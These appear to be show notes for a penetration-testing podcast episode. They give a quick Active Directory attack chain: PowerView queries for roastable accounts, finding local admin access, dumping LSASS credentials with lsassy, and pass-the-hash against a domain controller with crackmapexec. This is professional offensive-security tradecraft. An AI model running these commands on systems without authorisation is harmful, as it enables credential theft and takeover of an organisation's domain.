7MS #457: Tales of Internal Network Pentest Pwnage - Part 25

This episode of 7 Minute Security is sponsored by Datadog. Accelerate security investigations and break down silos between developers, security, and operations teams by correlating your threats, metrics, traces, and logs all in one place. Try it for yourself and get a free t-shirt at http://datadog.com/7ms

Hi! This episode of pentest pwnage is a fun one because it was built for speeeeeeeeeeeeeeeed. Here's some of the things we're doing/running when time is of the essence:

  • Get a cmd.exe spun up in the context of your AD user account:
runas /netonly /user:samplecompany\billybob "C:\windows\system32\cmd.exe"

Then get some important info in PowerView:

  • Get-DomainUser -PreAuthNotRequired - find AD users with this flag set...then crack the hash for a (potentially) easy win!

  • Get-NetUser -spn - find Kerberoastable accounts...then crack the hash for a (potentially) easy win!

  • Find-LocalAdminAccess -Verbose helps you find where your general AD user has local admin access!

Once you know where you have local admin access, lsassy is your friend:

  • lsassy -d domain.com -u YOUR-USER -p YOUR-PASSWORD victim-server

Did you get an admin's NTLM hash from this dump? Then do this:

  • crackmapexec smb IP.OF.THE.DOMAINCONTROLLER -u ACCOUNT-YOU-DUMPED -H 'NTLM-HASH-OF-THAT-ACCOUNT-YOU-DUMPED

(Pwn3d!) FTW!